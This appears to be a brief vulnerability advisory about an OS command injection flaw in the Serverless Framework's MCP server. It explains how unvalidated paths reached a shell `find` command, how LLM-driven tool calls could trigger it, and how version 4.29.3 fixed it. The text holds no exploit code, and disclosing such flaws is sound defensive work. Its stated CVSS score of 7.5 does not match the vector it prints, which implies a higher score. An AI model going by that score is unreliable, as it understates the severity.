Serverless Command Injection: When 'Experimental' Means 'Remote Shell'
Jan 1, 2026·4 min read·10 visits
Executive Summary (TL;DR)
A classic OS Command Injection vulnerability in the Serverless Framework's MCP server (`@serverless/mcp`). The `list-projects` tool passed unvalidated user input directly into a `find` command spawned via `child_process.exec`. This allowed Remote Code Execution (RCE) on the developer's machine. Fixed in version 4.29.3 by switching to `execFile` and implementing path validation.
The Serverless Framework's experimental Model Context Protocol (MCP) server contained a critical command injection vulnerability. By failing to sanitize directory paths passed to a shell command, the tool allowed attackers—or confused LLMs—to execute arbitrary system commands.
Official Patches
Fix Analysis (1)
Technical Appendix
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:HAffected Systems
Affected Versions Detail
| Product | Affected Versions | Fixed Version |
|---|---|---|
Serverless Framework (MCP) Serverless, Inc. | 4.29.0 - 4.29.2 | 4.29.3 |
| Attribute | Detail |
|---|---|
| CWE ID | CWE-78 (OS Command Injection) |
| CVSS Score | 7.5 (High) |
| Attack Vector | Network / Local (via MCP Interface) |
| Impact | High (Confidentiality, Integrity, Availability) |
| Component | @serverless/mcp |
| Vulnerable Function | findServerlessFrameworkProjects (via child_process.exec) |
MITRE ATT&CK Mapping
The software constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component.